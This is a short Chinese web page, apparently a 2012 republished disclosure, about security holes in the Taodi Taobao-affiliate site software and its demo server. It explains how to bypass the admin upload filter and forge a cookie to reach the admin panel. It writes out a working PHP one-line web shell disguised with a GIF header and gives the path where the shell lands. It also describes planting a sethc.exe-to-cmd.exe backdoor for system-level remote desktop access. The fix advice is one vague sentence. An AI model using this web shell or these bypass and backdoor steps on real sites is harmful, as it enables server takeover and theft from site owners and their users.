淘帝淘宝客安全漏洞及修复

官网:http://www.taodisoft.com

1、演示站后台竟然有一个地方可上传图片,没有禁止上传。
2、上传图片简单过滤,很容易突破,上传php文件,并能执行。
3、服务器(vps)配置严重低级,拿到webshell之后直接是系统权限,windows系统,替换sethc.exe,直接远程桌面连接即可。
4、其所销售的源代码同样存在此上传漏洞。
5、其所销售的源代码还存在伪造cookie直接进入后台漏洞。所以其所销售的源代码网站后台路径不改,可直接修改cookie进入后台,插入一句话木马或者直接上传可执行文件,拿到webshell。

上传地址是:后台-首页配置-分类产品-下面图片上传

淘帝淘宝客安全漏洞及修复

直接构造shell.php文件代码

GIF89A

<?php @eval($_POST[pass]);?>

上传即可得到shell,地址是:http://www.2cto.com/img/index/shell.php

拿到webshell之后就是系统权限了。。。。。。。

淘帝淘宝客安全漏洞及修复

把sethc.exe替换成cmd.exe

淘帝淘宝客安全漏洞及修复

BY:路人甲 ,由情整理编辑

www.2cto.com提供修复策略:程序也不是新问题,加强过滤。服务器安全就是个复杂问题了,参考本站文章

分类:默认分类 时间:2012-01-09 人气:3
本文关键词:
分享到:

相关文章

Copyright (C) quwantang.com, All Rights Reserved.

趣玩堂 版权所有 京ICP备15002868号

processed in 0.052 (s). 9 q(s)